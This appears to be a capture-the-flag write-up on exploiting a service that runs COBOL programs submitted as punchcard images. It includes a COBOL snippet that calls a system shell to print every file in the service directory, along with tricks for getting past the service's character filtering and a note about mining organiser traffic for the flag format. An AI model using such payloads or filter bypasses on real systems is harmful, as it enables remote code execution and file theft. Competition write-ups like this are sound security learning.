We analyzed source code on python and observed these key points:
First, we will describe you our solution and then we will provide more details on how we created it.
We generated a sequence of punchcards with encoded cobol exploit on them -- one line of code on each card, also some tabulation was required to bypass sintax errors which cobol generated. Exploit itself is pretty simple:
IDENTIFICATION DIVISION.
PROGRAM-ID. HELLO.
PROCEDURE DIVISION. BEGIN.
CALL >SYSTEM> USING
FUNCTION LOWER-CASE(>FIND . -TYPE F -EXEC CAT {} \;>). STOP RUN.
To send this script we generated 5 punchcards for each line. Script shows us contents of each file in service's directory. Using this script we basically have rce and can do much more stuff than simply printing file contents.
To generate valid punchcard we used this script.
(can be found by simply googling "python generate punchcard")
Most important things which helped us to solve the task:
- http request which organisators sent to store flags. In traffic we found these things:
** image of valid punchcard, which service can handle without error
** text which was encoded in these punchcards -- it was on html page with uploads, where user can join some pieces and then run them. There we just saw this type of code:
IDENTIFICATION DIVISION.
PROGRAM-ID. FLAG.
DATA DIVISION. WORKING-STORAGE SECTION. 01 FLG.
05 FLGBASE32A PIC X(32) VALUE "IZAVKU2UL5ME63DWOBEVSQSTJNCFETLX".
05 FLGBASE32B PIC X(32) VALUE "IFAUCQKEIREDK5CEIJHDSSCSKZGEC===".
PROCEDURE DIVISION. BEGIN. DISPLAY FLG. STOP RUN.
This code was sent in punchcards one line on each card.
Flag consists of two base32 encoded parts on lines 4 and 5. We determined that this code for cobol programming language. Then we just wrote our exploit on cobol. It is worth mentioning that after uploading image and before executing the cobol code itself, some internal transformation of input happens (in .so files), namely some characters were discarded (like lowercase letters), some characters were translated into others and some characters just generated error on server. Emperically we found that character <
translates into "
. Problem with dropped lowercase letters we solved by using cobol's funcion LOWER-CASE
on our shell command.